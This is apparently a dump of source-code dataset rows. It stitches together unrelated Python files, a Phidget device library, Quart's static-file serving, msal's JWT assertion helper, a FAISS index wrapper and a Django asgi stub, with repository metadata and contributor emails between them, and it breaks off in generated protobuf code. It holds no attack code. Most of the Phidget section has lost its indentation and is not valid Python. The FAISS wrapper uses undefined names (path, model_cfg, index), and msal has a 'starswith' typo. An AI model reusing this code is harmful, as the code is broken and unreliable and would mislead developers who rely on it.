self.__attach(AttachEventArgs(self))
return 0
def setOnAttachHandler(self, attachHandler):
"""Sets the Attach Event Handler.
The attach handler is a method that will be called when this Phidget is physically attached to the system, and has gone through its initalization, and so is ready to be used.
Parameters:
attachHandler: hook to the attachHandler callback function
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened.
"""
if attachHandler == None:
self.__attach = None
self.__onAttach = None
else:
self.__attach = attachHandler
self.__onAttach = self.__ATTACHHANDLER(self.__nativeAttachEvent)
try:
result = PhidgetLibrary.getDll().CPhidget_set_OnAttach_Handler(self.handle, self.__onAttach, None)
except RuntimeError:
self.__attach = None
self.__onAttach = None
raise
if result > 0:
raise PhidgetException(result)
def __nativeDetachEvent(self, handle, usrptr):
if self.__detach != None:
self.__detach(DetachEventArgs(self))
return 0
def setOnDetachHandler(self, detachHandler):
"""Sets the Detach Event Handler.
The detach handler is a method that will be called when this Phidget is phisically detached from the system, and is no longer available.
This is particularly usefull for applications when a phisical detach would be expected.
Remember that many of the methods, if called on an unattached device, will throw a PhidgetException.
This Exception can be checked to see if it was caused by a device being unattached, but a better method would be to regiter the detach handler,
which could notify the main program logic that the device is no longer available, disable GUI controls, etc.
Parameters:
detachHandler: hook to the detachHandler callback function
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened.
"""
if detachHandler == None:
self.__detach = None
self.__onDetach = None
else:
self.__detach = detachHandler
self.__onDetach = self.__DETACHHANDLER(self.__nativeDetachEvent)
try:
result = PhidgetLibrary.getDll().CPhidget_set_OnDetach_Handler(self.handle, self.__onDetach, None)
except RuntimeError:
self.__detach = None
self.__onDetach = None
raise
if result > 0:
raise PhidgetException(result)
def __nativeErrorEvent(self, handle, usrptr, errorCode, errorMessage):
if self.__error != None:
code = errorCode
message = errorMessage
self.__error(ErrorEventArgs(self, message, code))
return 0
def setOnErrorhandler(self, errorHandler):
"""Sets the Error Event Handler.
The error handler is a method that will be called when an asynchronous error occurs.
Error events are not currently used, but will be in the future to report any problems that happen out of context from a direct function call.
Parameters:
errorHandler: hook to the errorHandler callback function.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened.
"""
if errorHandler == None:
self.__error = None
self.__onError = None
else:
self.__error = errorHandler
self.__onError = self.__ERRORHANDLER(self.__nativeErrorEvent)
try:
result = PhidgetLibrary.getDll().CPhidget_set_OnError_Handler(self.handle, self.__onError, None)
except RuntimeError:
self.__error = None
self.__onError = None
raise
if result > 0:
raise PhidgetException(result)
def waitForAttach(self, timeout):
"""Waits for this Phidget to become available.
This method can be called after open has been called to wait for thid Phidget to become available.
This is usefull because open is asynchronous (and thus returns immediately), and most methods will throw a PhidgetException is they are called before a device is actually ready.
This method is synonymous with polling the isAttached method until it returns True, or using the Attach event.
This method blocks for up to the timeout, at which point it will throw a PhidgetException. Otherwise, it returns when the phidget is attached and initialized.
A timeout of 0 is infinite.
Parameters:
timeout<long>: Timeout in milliseconds
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened.
"""
try:
result = PhidgetLibrary.getDll().CPhidget_waitForAttachment(self.handle, c_long(timeout))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def __nativeServerConnectEvent(self, handle, usrptr):
if self.__serverConnect != None:
self.__serverConnect(ServerConnectArgs(self))
return 0
def setOnServerConnectHandler(self, serverConnectHandler):
"""Sets the Server Connect Event Handler.
The serverConnect handler is a method that will be called when a connection to a server is made. This is only usefull for Phidgets opened remotely.
Parameters:
serverConnectHandler: hook to the serverConnectHandler callback function
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened
"""
if serverConnectHandler == None:
self.__serverConnect = None
self.__onServerConnect = None
else:
self.__serverConnect = serverConnectHandler
self.__onServerConnect = self.__SERVERATTACHHANDLER(self.__nativeServerConnectEvent)
try:
result = PhidgetLibrary.getDll().CPhidget_set_OnServerConnect_Handler(self.handle, self.__onServerConnect, None)
except RuntimeError:
self.__serverConnect = None
self.__onServerConnect = None
raise
if result > 0:
raise PhidgetException(result)
def __nativeServerDisconnectEvent(self, handle, usrptr):
if self.__serverDisconnect != None:
self.__serverDisconnect(ServerConnectArgs(self))
return 0
def setOnServerDisconnectHandler(self, serverDisconnectHandler):
"""Set the Server Disconnect event handler.
The serverDisconnect handler is a method that will be called when a connection to a server is terminated. This is only usefull for Phidgets opened remotely.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened
"""
if serverDisconnectHandler == None:
self.__serverDisconnect = None
self.__onServerDisconnect = None
else:
self.__serverDisconnect = serverDisconnectHandler
self.__onServerDisconnect = self.__SERVERDETACHHANDLER(self.__nativeServerDisconnectEvent)
try:
result = PhidgetLibrary.getDll().CPhidget_set_OnServerDisconnect_Handler(self.handle, self.__onServerDisconnect, None)
except RuntimeError:
self.__serverDisconnect = None
self.__onServerDisconnect = None
raise
if result > 0:
raise PhidgetException(result)
def getServerAddress(self):
"""Returns the Address of a Phidget Webservice.
Returns the Address of a Phidget Webservice when this Phidget was opened as remote.
This may be an IP Address or a hostname.
Returns:
The Address of the Webservice <string>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: if this Phidget was open opened as a remote Phidget.
"""
serverAddr = c_char_p()
port = c_int()
try:
result = PhidgetLibrary.getDll().CPhidget_getServerAddress(self.handle, byref(serverAddr), byref(port))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return prepOutput(serverAddr)
def getServerID(self):
"""Returns the Server ID of a Phidget Webservice.
Returns the Server ID of a Phidget Webservice when this Phidget was opened as remote.
This is an arbitrary server identifier, independant of IP address and Port.
Returns:
The ServerID of the Webservice <string>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: if this Phidget was open opened as a remote Phidget.
"""
serverID = c_char_p()
try:
result = PhidgetLibrary.getDll().CPhidget_getServerID(self.handle, byref(serverID))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return prepOutput(serverID)
def isAttachedToServer(self):
"""Returns the network attached status for remotely opened Phidgets.
This method returns True or False, depending on whether a connection to the Phidget WebService is open - or not.
If this is false for a remote Phidget then the connection is not active - either because a connection has not yet been established,
or because the connection was terminated.
Returns:
Phidget Network Attached Status <boolean>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened remotely.
"""
serverStatus = c_int()
try:
result = PhidgetLibrary.getDll().CPhidget_getServerStatus(self.handle, byref(serverStatus))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
if serverStatus.value == 1:
return True
else:
return False
    @staticmethod
    def enableLogging(level, file):
        """Turns on logging in the native C library.

        This is mostly useful for debugging - when an issue needs to be
        resolved by Phidgets Inc.  The output is mostly low-level library
        information; user entries can be inserted amongst it with Phidget.log.

        The level can be one of:
        PhidgetLogLevel.PHIDGET_LOG_CRITICAL (1),
        PhidgetLogLevel.PHIDGET_LOG_ERROR (2),
        PhidgetLogLevel.PHIDGET_LOG_WARNING (3),
        PhidgetLogLevel.PHIDGET_LOG_DEBUG (4),
        PhidgetLogLevel.PHIDGET_LOG_INFO (5) or
        PhidgetLogLevel.PHIDGET_LOG_VERBOSE (6)
        (An earlier revision of this docstring listed these numbers in the
        reverse order; the values above match the PhidgetLogLevel constants
        defined in this module.)

        Parameters:
            level<int>: highest level of logging that will be output; the PhidgetLogLevel constants provide readable names.
            file<string>: path and name of file to output to. Specify NULL to output to the console.
        Exceptions:
            RuntimeError - If current platform is not supported/phidget c dll cannot be found
            PhidgetException
        """
        try:
            result = PhidgetLibrary.getDll().CPhidget_enableLogging(c_int(level), c_char_p(file))
        except RuntimeError:
            raise
        if result > 0:
            raise PhidgetException(result)
@staticmethod
def disableLogging():
"""Turns off logging in the native C Library.
This only needs to be called if enableLogging was called to turn logging on.
This will turn logging back off.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException
"""
try:
result = PhidgetLibrary.getDll().CPhidget_disableLogging()
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
@staticmethod
def log(level, id, log):
"""Adds a log entry into the phidget log.
This log is enabled by calling enableLogging and this allows the entry of user logs in amongst the phidget library logs.
The level can be one of:
PhidgetLogLevel.PHIDGET_LOG_VERBOSE,
PhidgetLogLevel.PHIDGET_LOG_INFO,
PhidgetLogLevel.PHIDGET_LOG_DEBUG,
PhidgetLogLevel.PHIDGET_LOG_WARNING,
PhidgetLogLevel.PHIDGET_LOG_ERROR or
PhidgetLogLevel.PHIDGET_LOG_CRITICAL
Note: PhidgetLogLevel.PHIDGET_LOG_DEBUG should not be used, as these logs are only printed when using the debug library,
which is not generally available.
Parameters:
level<int>: level to enter the log at.
id<string>: an arbitrary identifier for this log. This can be NULL. The C library uses this field for source filename and line number.
log<string>: the message to log.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException
"""
try:
result = PhidgetLibrary.getDll().CPhidget_log(c_int(level), c_char_p(id), c_char_p(log))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
| [
"tijmenvangurp@gmail.com"
] | tijmenvangurp@gmail.com |
279cb2ad93e730ca5ab7226c3892dc7e540539d1 | 19a3342618f008f1607617a7c816ba0072010ee6 | /truth_teller/easy_first/linux_python/bin/idle | 68a47b934072fb7f8067d9e574ede1c160476011 | [
"MIT"
] | permissive | gabrielStanovsky/unified-factuality | 9c72d89eff80d933f384ae3254b9a20e14bddee4 | 869fd23ec8fe71ab2b9f30389018615932d27cde | refs/heads/master | 2021-03-22T05:15:41.191073 | 2017-12-11T12:59:49 | 2017-12-11T12:59:49 | 88,627,892 | 8 | 2 | null | null | null | null | UTF-8 | Python | false | false | 99 | #!/usr/local/bin/python2.7
# IDLE launcher stub: delegate straight to idlelib's shell entry point.
from idlelib.PyShell import main
if __name__ == '__main__':
    main()
| [
"gabriel.satanovsky@gmail.com"
] | gabriel.satanovsky@gmail.com | |
9297cbb7a505e0c7a50a1da2c83a5bfeeba64abb | d1e90cae0562e9e14876309912f59b6855d91e64 | /app/lib/python3.7/site-packages/quart/static.py | 2a62574ce60fa687ae6f03a964ac5eb4502f4dba | [] | no_license | FoolForCS/sample-server | 518fb55c6b87ecb3f8be5e9a4184a6e90fd4932d | 9499c8820ae4043959894f077101c174f57890e6 | refs/heads/master | 2020-05-18T11:16:51.651490 | 2019-05-05T18:39:22 | 2019-05-05T18:39:22 | 184,372,008 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,795 | py | import mimetypes
import os
import pkgutil
import sys
from datetime import datetime, timedelta
from pathlib import Path
from typing import AnyStr, IO, Optional
from zlib import adler32
from jinja2 import FileSystemLoader
from .exceptions import NotFound
from .globals import current_app, request
from .typing import FilePath
from .utils import file_path_to_path
from .wrappers import Response
# Fallback Content-Type used when a file's mimetype cannot be guessed
# from its name (see send_file below).
DEFAULT_MIMETYPE = 'application/octet-stream'
class PackageStatic:
    """Locate and serve a package's static files and templates.

    The object's ``root_path`` is resolved from ``import_name`` (or an
    explicit ``root_path``), and the static folder, static URL path and
    Jinja template loader are all derived from it.
    """

    def __init__(
            self,
            import_name: str,
            template_folder: Optional[str]=None,
            root_path: Optional[str]=None,
            static_folder: Optional[str]=None,
            static_url_path: Optional[str]=None,
    ) -> None:
        # import_name is used to locate the package on disk when no
        # explicit root_path is given (see _find_root_path).
        self.import_name = import_name
        self.template_folder = Path(template_folder) if template_folder is not None else None
        self.root_path = self._find_root_path(root_path)
        # Initialise the backing fields first; the two assignments below
        # go through the property setters, which overwrite them.
        self._static_folder: Optional[Path] = None
        self._static_url_path: Optional[str] = None
        self.static_folder = static_folder
        self.static_url_path = static_url_path

    @property
    def static_folder(self) -> Optional[Path]:
        # Absolute path of the static folder (relative folders are
        # anchored at root_path), or None when no folder is configured.
        if self._static_folder is not None:
            return self.root_path / self._static_folder
        else:
            return None

    @static_folder.setter
    def static_folder(self, static_folder: Optional[FilePath]) -> None:
        if static_folder is not None:
            self._static_folder = file_path_to_path(static_folder)
        else:
            self._static_folder = None

    @property
    def static_url_path(self) -> Optional[str]:
        # An explicitly set URL path wins; otherwise derive it from the
        # static folder's name (e.g. folder "static" -> "/static").
        if self._static_url_path is not None:
            return self._static_url_path
        if self.static_folder is not None:
            return '/' + self.static_folder.name
        else:
            return None

    @static_url_path.setter
    def static_url_path(self, static_url_path: str) -> None:
        self._static_url_path = static_url_path

    @property
    def has_static_folder(self) -> bool:
        # True when a static folder has been configured.
        return self.static_folder is not None

    @property
    def jinja_loader(self) -> Optional[FileSystemLoader]:
        # Loader rooted at root_path/template_folder, or None when this
        # object has no template folder.
        if self.template_folder is not None:
            return FileSystemLoader(os.fspath(self.root_path / self.template_folder))
        else:
            return None

    def get_send_file_max_age(self, filename: str) -> int:
        # Default cache timeout (seconds) for files served by
        # send_static_file; the filename argument is unused here so
        # subclasses can vary the timeout per file.
        # NOTE(review): total_seconds() returns a float although the
        # annotation says int -- confirm callers tolerate a float.
        return current_app.send_file_max_age_default.total_seconds()

    async def send_static_file(self, filename: str) -> Response:
        """Serve *filename* from this object's static folder."""
        if not self.has_static_folder:
            raise RuntimeError('No static folder for this object')
        return await send_from_directory(self.static_folder, filename)

    def open_resource(self, path: FilePath, mode: str='rb') -> IO[AnyStr]:
        """Open a file, relative to root_path, for reading.

        Only the read modes 'r' and 'rb' are accepted. Use as

        .. code-block:: python

            with app.open_resource(path) as file_:
                file_.read()
        """
        if mode not in {'r', 'rb'}:
            raise ValueError('Files can only be opened for reading')
        return open(self.root_path / file_path_to_path(path), mode)

    def _find_root_path(self, root_path: Optional[str]=None) -> Path:
        """Resolve the package's root directory.

        An explicit root_path wins; otherwise the path is derived from
        the imported module's __file__, then from the import loader,
        and finally falls back to the current working directory.
        """
        if root_path is not None:
            return Path(root_path)
        else:
            module = sys.modules.get(self.import_name)
            if module is not None and hasattr(module, '__file__'):
                file_path = module.__file__
            else:
                loader = pkgutil.get_loader(self.import_name)
                # Scripts run as __main__ have no usable loader path.
                if loader is None or self.import_name == '__main__':
                    return Path.cwd()
                else:
                    file_path = loader.get_filename(self.import_name)  # type: ignore
            return Path(file_path).resolve().parent
def safe_join(directory: FilePath, *paths: FilePath) -> Path:
    """Join *paths* onto *directory* without escaping it.

    Both the base directory and the joined result are resolved with
    ``strict=True``, so a nonexistent path is also rejected.

    Raises:
        NotFound: if the joined path does not exist, or does not lie
            inside the base directory.
    """
    try:
        base = file_path_to_path(directory).resolve(strict=True)
        target = file_path_to_path(directory, *paths).resolve(strict=True)
    except FileNotFoundError:
        raise NotFound()
    try:
        target.relative_to(base)
    except ValueError:
        # The resolved target escaped the base directory.
        raise NotFound()
    return target
async def send_from_directory(
        directory: FilePath,
        file_name: str,
        *,
        mimetype: Optional[str]=None,
        as_attachment: bool=False,
        attachment_filename: Optional[str]=None,
        add_etags: bool=True,
        cache_timeout: Optional[int]=None,
        conditional: bool=True,
        last_modified: Optional[datetime]=None,
) -> Response:
    """Send the file named *file_name* located under *directory*.

    The two path arguments are combined via :func:`safe_join`, which
    guards against path traversal.  A combination that does not name a
    regular file raises ``NotFound``.

    See :func:`send_file` for the keyword arguments.
    """
    resolved = safe_join(directory, file_name)
    if resolved.is_file():
        return await send_file(
            resolved,
            mimetype=mimetype,
            as_attachment=as_attachment,
            attachment_filename=attachment_filename,
            add_etags=add_etags,
            cache_timeout=cache_timeout,
            conditional=conditional,
            last_modified=last_modified,
        )
    raise NotFound()
async def send_file(
        filename: FilePath,
        mimetype: Optional[str]=None,
        as_attachment: bool=False,
        attachment_filename: Optional[str]=None,
        add_etags: bool=True,
        cache_timeout: Optional[int]=None,
        conditional: bool=False,
        last_modified: Optional[datetime]=None,
) -> Response:
    """Return a Response to send the filename given.

    Arguments:
        filename: The filename (path) to send, remember to use
            :func:`safe_join`.
        mimetype: Mimetype to use, by default it will be guessed or
            revert to the DEFAULT_MIMETYPE.
        as_attachment: If true use the attachment filename in a
            Content-Disposition attachment header.
        attachment_filename: Name for the filename, if it differs.
        add_etags: Set etags based on the filename, size and
            modification time.
        cache_timeout: Time in seconds for the response to be cached.
        conditional: Make the response conditional on the request's
            Range header.
        last_modified: Used to override the last modified value.
    """
    file_path = file_path_to_path(filename)
    if attachment_filename is None:
        attachment_filename = file_path.name
    if mimetype is None:
        # Guess from the (attachment) name, falling back to a generic
        # binary type when the extension is unknown.
        mimetype = mimetypes.guess_type(attachment_filename)[0] or DEFAULT_MIMETYPE
    file_body = current_app.response_class.file_body_class(file_path)
    response = current_app.response_class(file_body, mimetype=mimetype)
    if as_attachment:
        response.headers.add('Content-Disposition', 'attachment', filename=attachment_filename)
    if last_modified is not None:
        response.last_modified = last_modified
    else:
        response.last_modified = datetime.fromtimestamp(file_path.stat().st_mtime)
    response.cache_control.public = True
    # NOTE: a cache_timeout of 0 is falsy and therefore treated the
    # same as None, i.e. replaced by the application default.
    cache_timeout = cache_timeout or current_app.get_send_file_max_age(file_path)
    if cache_timeout is not None:
        response.cache_control.max_age = cache_timeout
        response.expires = datetime.utcnow() + timedelta(seconds=cache_timeout)
    if add_etags:
        # Stat exactly once so the mtime and size in the etag come from
        # the same snapshot of the file; the previous code statted twice
        # and could mix values if the file changed in between.
        file_stat = file_path.stat()
        response.set_etag(
            '{}-{}-{}'.format(
                file_stat.st_mtime, file_stat.st_size,
                adler32(bytes(file_path)),
            ),
        )
    if conditional:
        await response.make_conditional(request.range)
    return response
| [
"siddhantsharan@MacBook-Pro-4.Dlink"
] | siddhantsharan@MacBook-Pro-4.Dlink |
6185c4ee4b791c20f5d13010e878886cc6615246 | 59063718a915ea1be886b927bc469efdf6b2786d | /samples/python/02.echo-bot/envs/chat_bot_02/Lib/site-packages/msal/oauth2cli/assertion.py | e84400df0bed3c62883ea5c08118322fa43c6fc8 | [
"MIT",
"LicenseRef-scancode-generic-cla"
] | permissive | luzeunice/BotBuilder-Samples | 665a397e79785b5fabfa0282ea2abb302182db48 | b62be4e8863125a567902b736b7b74313d9d4f28 | refs/heads/master | 2022-12-01T01:39:41.911152 | 2020-08-15T00:26:00 | 2020-08-15T00:26:00 | 287,571,525 | 0 | 0 | MIT | 2020-08-14T15:59:01 | 2020-08-14T15:59:00 | null | UTF-8 | Python | false | false | 4,660 | py | import time
import binascii
import base64
import uuid
import logging
import jwt
logger = logging.getLogger(__name__)
class AssertionCreator(object):
def create_normal_assertion(
self, audience, issuer, subject, expires_at=None, expires_in=600,
issued_at=None, assertion_id=None, **kwargs):
"""Create an assertion in bytes, based on the provided claims.
All parameter names are defined in https://tools.ietf.org/html/rfc7521#section-5
except the expires_in is defined here as lifetime-in-seconds,
which will be automatically translated into expires_at in UTC.
"""
raise NotImplementedError("Will be implemented by sub-class")
def create_regenerative_assertion(
self, audience, issuer, subject=None, expires_in=600, **kwargs):
"""Create an assertion as a callable,
which will then compute the assertion later when necessary.
This is a useful optimization to reuse the client assertion.
"""
return AutoRefresher( # Returns a callable
lambda a=audience, i=issuer, s=subject, e=expires_in, kwargs=kwargs:
self.create_normal_assertion(a, i, s, expires_in=e, **kwargs),
expires_in=max(expires_in-60, 0))
class AutoRefresher(object):
"""Cache the output of a factory, and auto-refresh it when necessary. Usage::
r = AutoRefresher(time.time, expires_in=5)
for i in range(15):
print(r()) # the timestamp change only after every 5 seconds
time.sleep(1)
"""
def __init__(self, factory, expires_in=540):
self._factory = factory
self._expires_in = expires_in
self._buf = {}
def __call__(self):
EXPIRES_AT, VALUE = "expires_at", "value"
now = time.time()
if self._buf.get(EXPIRES_AT, 0) <= now:
logger.debug("Regenerating new assertion")
self._buf = {VALUE: self._factory(), EXPIRES_AT: now + self._expires_in}
else:
logger.debug("Reusing still valid assertion")
return self._buf.get(VALUE)
class JwtAssertionCreator(AssertionCreator):
def __init__(self, key, algorithm, sha1_thumbprint=None, headers=None):
"""Construct a Jwt assertion creator.
Args:
key (str): The key for signing, e.g. a base64 encoded private key.
algorithm (str):
"RS256", etc.. See https://pyjwt.readthedocs.io/en/latest/algorithms.html
RSA and ECDSA algorithms require "pip install cryptography".
sha1_thumbprint (str): The x5t aka X.509 certificate SHA-1 thumbprint.
headers (dict): Additional headers, e.g. "kid" or "x5c" etc.
"""
self.key = key
self.algorithm = algorithm
self.headers = headers or {}
if sha1_thumbprint: # https://tools.ietf.org/html/rfc7515#section-4.1.7
self.headers["x5t"] = base64.urlsafe_b64encode(
binascii.a2b_hex(sha1_thumbprint)).decode()
def create_normal_assertion(
self, audience, issuer, subject=None, expires_at=None, expires_in=600,
issued_at=None, assertion_id=None, not_before=None,
additional_claims=None, **kwargs):
"""Create a JWT Assertion.
Parameters are defined in https://tools.ietf.org/html/rfc7523#section-3
Key-value pairs in additional_claims will be added into payload as-is.
"""
now = time.time()
payload = {
'aud': audience,
'iss': issuer,
'sub': subject or issuer,
'exp': expires_at or (now + expires_in),
'iat': issued_at or now,
'jti': assertion_id or str(uuid.uuid4()),
}
if not_before:
payload['nbf'] = not_before
payload.update(additional_claims or {})
try:
return jwt.encode(
payload, self.key, algorithm=self.algorithm, headers=self.headers)
except:
if self.algorithm.startswith("RS") or self.algorithm.starswith("ES"):
logger.exception(
'Some algorithms requires "pip install cryptography". '
'See https://pyjwt.readthedocs.io/en/latest/installation.html#cryptographic-dependencies-optional')
raise
# Obsolete. For backward compatibility. They will be removed in future versions.
Signer = AssertionCreator # For backward compatibility
JwtSigner = JwtAssertionCreator # For backward compatibility
JwtSigner.sign_assertion = JwtAssertionCreator.create_normal_assertion # For backward compatibility
| [
"53527436+LuzEuniceTec@users.noreply.github.com"
] | 53527436+LuzEuniceTec@users.noreply.github.com |
78bd3bce57cbbfad6500ce8bde3647b2e9309e76 | b4112069bf02c51a70171470b783b54edb7adbc8 | /cli/app/indexes/faiss_index.py | 071cc799218237956811f846b94ac9664e8703de | [] | no_license | breezykermo/vframe_search | 41325850a56318ff26c646b426a4bae143491294 | 7dc2c9c97e1ef69ae42c6c1c60d957968dc2f491 | refs/heads/master | 2020-08-09T02:26:42.131057 | 2019-10-14T11:55:08 | 2019-10-14T11:55:08 | 213,977,612 | 1 | 0 | null | 2019-10-14T11:55:09 | 2019-10-09T17:11:11 | null | UTF-8 | Python | false | false | 1,878 | py | """FAISS index can use PCA to reduce file size but runs in-memory"""
import os
import numpy as np
import faiss
from app.settings import app_cfg
class FAISSIndex:
def __init__(self, feature):
self.feature = feature
self.model_cfg = app_cfg.MODELZOO_CFG.get(feature.modelzoo_name)
self.recipe = self.feature.get_recipe('faiss')
if 'factory_type' not in self.recipe:
print("No factory_type specified!")
self.factory_type = self.recipe['factory_type']
self.path = os.path.join(app_cfg.DIR_INDEXES, self.feature.index_type, self.feature.modelzoo_name)
self.fn = path.join(self.path, "faiss-{}.index".format(self.factory_type.replace(',', '_')))
self.can_append = True
os.makedirs(self.path, exist_ok=True)
def load(self):
if os.path.exists(self.fn):
self.index = faiss.read_index(self.fn)
else:
return self.create()
def create(self):
self.index = faiss.index_factory(model_cfg.get('dimension'), self.factory_type)
def train(self, vecs):
'''Optional FAISS-only pretraining step'''
vecs = np.array(vecs)
index.train(vecs)
def add(self, vecs):
vecs = np.array(vecs)
self.index.add(vecs)
def add_one(self, vec):
self.index.add([vec])
def save(self):
faiss.write_index(self.index, self.fn)
def query(self, query, offset=0, limit=30):
end = offset + limit
distances, indexes = self.index.search(query, end)
if len(indexes) == 0:
print("weird, no results!")
return []
distances = distances[0]
indexes = indexes[0]
if offset > 0:
distances = distances[offset:offset+limit]
indexes = indexes[offset:offset+limit]
if len(indexes) == 0:
print("no results!")
return []
return distances, indexes
# add_start = time.time()
# index.add(feats)
# add_end = time.time()
# add_time = add_end - add_start
| [
"julescarbon@gmail.com"
] | julescarbon@gmail.com |
142144690c9bc570f2e861f2640f4b323329a7cc | b8f5cd64c19a16718f54f7cc1af047f5a1573dba | /policy/policy/asgi.py | f3d60ef03da070af178a0d538d72ca1426676a8b | [] | no_license | nimesh03/stockguard_quote | 1df5e2fad866e3ea57f7b105c3e3522a47854791 | e9a13c240b33a2a82e4d0186ce667039f18d290d | refs/heads/main | 2023-01-07T14:58:44.511109 | 2020-11-02T16:02:18 | 2020-11-02T16:02:18 | 309,235,971 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | """
ASGI config for policy project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
# Point Django at this project's settings module before the ASGI
# application object is created (setdefault keeps any value already
# present in the environment).
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'policy.settings')
# Module-level ASGI callable picked up by ASGI servers.
application = get_asgi_application()
| [
"nimesh19@hotmail.ca"
] | nimesh19@hotmail.ca |
0ea336d1bed70a132a1e8766836314253ea5c079 | 4433b1b3157275caa9ef667939ad7b24217df316 | /week1/thefirst_week/week4/unique_people.py | b574adbbef94b7f9cac0b19b4782aa811e460a86 | [] | no_license | Gabrielganchev/Programming0 | b8bf65014d01cc2d6e609332ff9beb527958b0bc | 249e14ba4194bab4be9938784d9c6f181985e1eb | refs/heads/master | 2016-08-07T15:34:19.874951 | 2015-05-14T17:26:05 | 2015-05-14T17:26:05 | 35,138,865 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 312 | py | def get_people_count(activity):
counted_people = []
for person in activity:
if person not in counted_people:
counted_people += [person]
return len(counted_people)
# Demo: ten activity entries with four distinct names -> prints 4.
print(get_people_count(["Rado", "Ivo", "Maria", "Anneta", "Rado", "Rado", "Anneta", "Ivo", "Maria", "Rado"]))
| [
"gabriel_ganchev@abv.bg"
] | gabriel_ganchev@abv.bg |
7493629d6e1853839179716db93c9a7fcec7dbf8 | 42c48f3178a48b4a2a0aded547770027bf976350 | /google/ads/google_ads/v5/proto/resources/customer_negative_criterion_pb2.py | a77e1ccec1e3bee71b3e49346e6e67070a3c1c2b | [
"Apache-2.0"
] | permissive | fiboknacky/google-ads-python | e989464a85f28baca1f28d133994c73759e8b4d6 | a5b6cede64f4d9912ae6ad26927a54e40448c9fe | refs/heads/master | 2021-08-07T20:18:48.618563 | 2020-12-11T09:21:29 | 2020-12-11T09:21:29 | 229,712,514 | 0 | 0 | Apache-2.0 | 2019-12-23T08:44:49 | 2019-12-23T08:44:49 | null | UTF-8 | Python | false | true | 14,503 | py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v5/proto/resources/customer_negative_criterion.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.ads.google_ads.v5.proto.common import criteria_pb2 as google_dot_ads_dot_googleads__v5_dot_proto_dot_common_dot_criteria__pb2
from google.ads.google_ads.v5.proto.enums import criterion_type_pb2 as google_dot_ads_dot_googleads__v5_dot_proto_dot_enums_dot_criterion__type__pb2
from google.api import field_behavior_pb2 as google_dot_api_dot_field__behavior__pb2
from google.api import resource_pb2 as google_dot_api_dot_resource__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v5/proto/resources/customer_negative_criterion.proto',
package='google.ads.googleads.v5.resources',
syntax='proto3',
serialized_options=b'\n%com.google.ads.googleads.v5.resourcesB\036CustomerNegativeCriterionProtoP\001ZJgoogle.golang.org/genproto/googleapis/ads/googleads/v5/resources;resources\242\002\003GAA\252\002!Google.Ads.GoogleAds.V5.Resources\312\002!Google\\Ads\\GoogleAds\\V5\\Resources\352\002%Google::Ads::GoogleAds::V5::Resources',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\nIgoogle/ads/googleads_v5/proto/resources/customer_negative_criterion.proto\x12!google.ads.googleads.v5.resources\x1a\x33google/ads/googleads_v5/proto/common/criteria.proto\x1a\x38google/ads/googleads_v5/proto/enums/criterion_type.proto\x1a\x1fgoogle/api/field_behavior.proto\x1a\x19google/api/resource.proto\x1a\x1cgoogle/api/annotations.proto\"\xe5\x06\n\x19\x43ustomerNegativeCriterion\x12Q\n\rresource_name\x18\x01 \x01(\tB:\xe0\x41\x05\xfa\x41\x34\n2googleads.googleapis.com/CustomerNegativeCriterion\x12\x14\n\x02id\x18\n \x01(\x03\x42\x03\xe0\x41\x03H\x01\x88\x01\x01\x12Q\n\x04type\x18\x03 \x01(\x0e\x32>.google.ads.googleads.v5.enums.CriterionTypeEnum.CriterionTypeB\x03\xe0\x41\x03\x12N\n\rcontent_label\x18\x04 \x01(\x0b\x32\x30.google.ads.googleads.v5.common.ContentLabelInfoB\x03\xe0\x41\x05H\x00\x12X\n\x12mobile_application\x18\x05 \x01(\x0b\x32\x35.google.ads.googleads.v5.common.MobileApplicationInfoB\x03\xe0\x41\x05H\x00\x12Y\n\x13mobile_app_category\x18\x06 \x01(\x0b\x32\x35.google.ads.googleads.v5.common.MobileAppCategoryInfoB\x03\xe0\x41\x05H\x00\x12G\n\tplacement\x18\x07 \x01(\x0b\x32-.google.ads.googleads.v5.common.PlacementInfoB\x03\xe0\x41\x05H\x00\x12N\n\ryoutube_video\x18\x08 \x01(\x0b\x32\x30.google.ads.googleads.v5.common.YouTubeVideoInfoB\x03\xe0\x41\x05H\x00\x12R\n\x0fyoutube_channel\x18\t 